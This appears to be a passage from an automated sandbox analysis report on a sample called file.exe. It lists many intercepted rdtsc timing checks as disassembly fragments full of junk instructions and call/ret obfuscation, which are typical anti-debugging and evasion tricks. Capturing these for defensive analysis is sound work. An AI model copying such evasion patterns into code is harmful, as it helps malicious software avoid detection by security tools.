                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BB0 second address: 804BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803A70 second address: 803A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BBB second address: 804BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808A2A second address: 808A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C58Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806D4A second address: 806D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808A3A second address: 808A96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F51CCC6C588h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 adc di, C770h 0x00000028 push 00000000h 0x0000002a jg 00007F51CCC6C587h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 mov ebx, 7111816Ch 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a pushad 0x0000003b ja 00007F51CCC6C586h 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 popad 0x00000044 push eax 0x00000045 push esi 0x00000046 pop esi 0x00000047 pop eax 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806D55 second address: 806D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808A96 second address: 808A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809932 second address: 80994A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F51CD041DF6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BB29 second address: 80BB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807CAB second address: 807CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809B62 second address: 809B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AB89 second address: 80AB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809B66 second address: 809B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CAEA second address: 80CAEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AB8D second address: 80AB93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CAEF second address: 80CB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F51CD041DFEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AB93 second address: 80ABB9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F51CCC6C597h 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CB00 second address: 80CBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 mov ebx, dword ptr [ebp+122D1D2Fh] 0x0000000c mov edi, dword ptr [ebp+122D3854h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F51CD041DF8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e movzx ebx, si 0x00000031 jmp 00007F51CD041E01h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F51CD041DF8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 call 00007F51CD041DFBh 0x00000057 adc bx, C431h 0x0000005c pop edi 0x0000005d xchg eax, esi 0x0000005e jmp 00007F51CD041E05h 0x00000063 push eax 0x00000064 jnc 00007F51CD041E19h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F51CD041E01h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CDF1 second address: 80CDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CDF5 second address: 80CDFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81046A second address: 81047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C591h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81047F second address: 810483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810558 second address: 81055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818428 second address: 81842C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81842C second address: 81844A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F51CCC6C586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F51CCC6C58Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81844A second address: 818452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818452 second address: 818468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C591h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818468 second address: 81846E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8185B1 second address: 8185B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8185B7 second address: 8185BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8185BB second address: 8185E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C593h 0x00000007 ja 00007F51CCC6C58Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8185E5 second address: 8185FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F51CD041DFFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8185FB second address: 8185FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8185FF second address: 818605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818605 second address: 81861D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007F51CCC6C586h 0x0000000d js 00007F51CCC6C586h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81861D second address: 818623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818623 second address: 818627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E8EA second address: 81E8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E8F0 second address: 81E91D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F51CCC6C586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jmp 00007F51CCC6C595h 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E91D second address: 81E953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F51CD041DF8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F51CD041DFAh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007F51CD041DFEh 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E953 second address: 81E957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EA87 second address: 81EA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825393 second address: 825398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8247ED second address: 8247F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8247F7 second address: 8247FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8247FB second address: 824818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CD041E03h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824B7F second address: 824B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824D72 second address: 824D7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F51CD041DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824EEC second address: 824EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824EF0 second address: 824F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E08h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F51CD041E0Dh 0x00000014 jmp 00007F51CD041E07h 0x00000019 jmp 00007F51CD041DFEh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8299A4 second address: 8299A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8299A8 second address: 8299B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F51CD041DF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8299B8 second address: 8299BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829C89 second address: 829C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829C8D second address: 829CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F51CCC6C597h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829F4B second address: 829F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829F4F second address: 829F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C590h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F51CCC6C58Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A3CB second address: 82A3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A852 second address: 82A870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F51CCC6C595h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A870 second address: 82A876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A876 second address: 82A885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F51CCC6C586h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A885 second address: 82A8B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jl 00007F51CD041E24h 0x00000012 jmp 00007F51CD041E03h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A8B5 second address: 82A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AA2F second address: 82AA33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AA33 second address: 82AA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82ADDE second address: 82ADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82969E second address: 8296B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F51CCC6C58Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8296B8 second address: 8296BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8311B7 second address: 8311BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8314A9 second address: 8314BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F51CD041DFAh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8314BA second address: 8314CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8314CC second address: 8314D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8314D2 second address: 8314D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F49E6 second address: 7F49F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F49F0 second address: 7F4A41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a movsx esi, di 0x0000000d mov dword ptr [ebp+122D2CFCh], esi 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp+1247A768h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F51CCC6C588h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D2BDAh] 0x0000003a nop 0x0000003b jl 00007F51CCC6C590h 0x00000041 pushad 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4A41 second address: 7F4A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4A4D second address: 7F4A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4A53 second address: 7F4A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4A5D second address: 7DE917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F51CCC6C588h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 call dword ptr [ebp+122D1952h] 0x00000029 push ebx 0x0000002a jmp 00007F51CCC6C58Eh 0x0000002f pop ebx 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5188 second address: 7F5192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5192 second address: 7F51B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F51CCC6C586h 0x0000000a popad 0x0000000b popad 0x0000000c xor dword ptr [esp], 73B9BBEFh 0x00000013 mov dword ptr [ebp+122D2A4Fh], ebx 0x00000019 push 3059B348h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F51B6 second address: 7F51BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F53F4 second address: 7F5408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F51CCC6C586h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5408 second address: 7F5430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFEh 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F51CD041E00h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F55AD second address: 7F55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F55B4 second address: 7F55BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F59A5 second address: 7F59AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5B20 second address: 7F5B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5B29 second address: 7F5B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C58 second address: 7F5C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C5C second address: 7F5C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a jmp 00007F51CCC6C58Dh 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F51CCC6C58Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5D84 second address: 7F5D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
